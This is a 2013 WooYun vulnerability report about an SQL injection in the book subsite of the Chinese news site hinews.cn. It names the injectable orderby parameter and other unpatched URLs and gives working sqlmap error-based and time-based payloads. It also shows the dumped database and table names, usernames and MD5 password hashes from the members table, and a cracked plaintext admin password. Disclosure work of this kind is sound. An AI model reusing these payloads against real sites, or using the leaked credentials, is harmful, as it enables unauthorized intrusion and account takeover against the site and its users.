当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046478

漏洞标题:南海网#某分站SQL注入漏洞

相关厂商:南海网

漏洞作者: 小驴牙牙

提交时间:2013-12-19 17:01

修复时间:2013-12-24 17:01

公开时间:2013-12-24 17:01

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-19: 细节已通知厂商并且等待厂商处理中
2013-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

隐秘的SQL注入,希望上主页

详细说明:

南海网读书频道:http://book.hinews.cn/
隐秘注射点:orderby这个字段存在注入
http://book.hinews.cn/search.php?chid=&sid=0?searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&caid=0&ccid4=0&indays=0&ordermode=0&searchsubmit=1&orderby=createdate'
未修复的注射点:
http://book.hinews.cn/list.php?caid=27
http://book.hinews.cn/archive.php?aid=541347

漏洞证明:

1.当前用户:

---
Place: GET
Parameter: orderby
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: chid=&sid=0?searchword=请输入关键字&caid=0&ccid4=0&indays=0&ordermode=0&searchsubmit=1&orderby=createdate AND (SELECT 4149 FROM(SELECT COUNT(*),CONCAT(0x3a7967703a,(SELECT (CASE WHEN (4149=4149) THEN 1 ELSE 0 END)),0x3a7367653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: chid=&sid=0?searchword=请输入关键字&caid=0&ccid4=0&indays=0&ordermode=0&searchsubmit=1&orderby=createdate AND SLEEP(5)
---
current user: 'books_user@192.168.%'


2.可跨库:

available databases [3]:
[*] dbbooks
[*] information_schema
[*] test


3.数据库dbbooks包含的表:

Database: dbbooks
[122 tables]
+-------------------+
| cms_alangs |
| cms_albums |
| cms_amconfigs |
| cms_amsgs |
| cms_answers |
| cms_archives |
| cms_archives_1 |
| cms_archives_2 |
| cms_archives_3 |
| cms_archives_4 |
| cms_archives_5 |
| cms_archives_rec |
| cms_archives_sub |
| cms_arecents |
| cms_asession |
| cms_aurls |
| cms_badwords |
| cms_btagnames |
| cms_catalogs |
| cms_channels |
| cms_clangs |
| cms_cmsgs |
| cms_cnconfigs |
| cms_cnfields |
| cms_cnodes |
| cms_coclass |
| cms_comments |
| cms_commus |
| cms_consults |
| cms_cotypes |
| cms_cradminlogs |
| cms_crprices |
| cms_crprojects |
| cms_cucatalogs |
| cms_cufields |
| cms_currencys |
| cms_dbfields |
| cms_dbsources |
| cms_extracts |
| cms_farchives |
| cms_farchives_1 |
| cms_farchives_2 |
| cms_farchives_3 |
| cms_farchives_4 |
| cms_farchives_5 |
| cms_favorites |
| cms_fcatalogs |
| cms_fchannels |
| cms_ffields |
| cms_fields |
| cms_forders |
| cms_freeinfos |
| cms_gmissions |
| cms_gmodels |
| cms_grouptypes |
| cms_gurls |
| cms_inmurls |
| cms_inurls |
| cms_keywords |
| cms_localfiles |
| cms_logerrortimes |
| cms_mafields |
| cms_matypes |
| cms_mcatalogs |
| cms_mchannels |
| cms_mcomments |
| cms_mcommus |
| cms_mconfigs |
| cms_mcufields |
| cms_members |
| cms_members_1 |
| cms_members_sub |
| cms_menus |
| cms_mfavorites |
| cms_mfields |
| cms_mflinks |
| cms_mfriends |
| cms_mlangs |
| cms_mmenus |
| cms_mmsgs |
| cms_mmtypes |
| cms_mprojects |
| cms_mreplys |
| cms_mreports |
| cms_msession |
| cms_mtconfigs |
| cms_mtrans |
| cms_mtypes |
| cms_murls |
| cms_offers |
| cms_orders |
| cms_pays |
| cms_permissions |
| cms_players |
| cms_pms |
| cms_purchases |
| cms_replys |
| cms_reports |
| cms_repugrades |
| cms_repus |
| cms_rprojects |
| cms_shipings |
| cms_sitemaps |
| cms_splangs |
| cms_sptpls |
| cms_subscribes |
| cms_subsites |
| cms_uclasses |
| cms_ucoclass |
| cms_ucotypes |
| cms_uprojects |
| cms_userfiles |
| cms_usergroups |
| cms_userurls |
| cms_usualurls |
| cms_utrans |
| cms_utypes |
| cms_vcatalogs |
| cms_vols |
| cms_voptions |
| cms_votes |
| cms_wordlinks |
+-------------------+


4.cm_members

Database: dbbooks
+-------------+---------+
| Table | Entries |
+-------------+---------+
| cms_members | 9 |
+-------------+---------+


5.管理员账户密码:

Database: dbbooks
Table: cms_members
[9 entries]
+-------+----------------------------------+
| mname | password |
+-------+----------------------------------+
| admin | 8e09d565470a4f5990a4489e3da5dbe1 |
| aaaaa | b427c90b069896a917d44ad8c9407cc5 |
| bbbbb | b4a677e8e15e8d797cff157c6ce9feef |
| 08cms | 4fd90e24d9df0a2074fbc9506d771b5a |
| ccccc | 108cc6ccf5b44ff898357e18f265c6cb |
| 匿名 | d19bc5de241d390220b17db7f79e0a8a |
| 评论网友 | 14e1b600b1fd579f47433b88e8d85291 |
| echo | 63ee451939ed580ef3c4b6f0109d1fd0 |
| helen | 21331de39c59dd108cb55bbbc42deedf |
+-------+----------------------------------+


密码是:hinews@2011

修复方案:

修复!

版权声明:转载请注明来源 小驴牙牙@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-24 17:01

厂商回复:

最新状态:

暂无


漏洞评价:

评论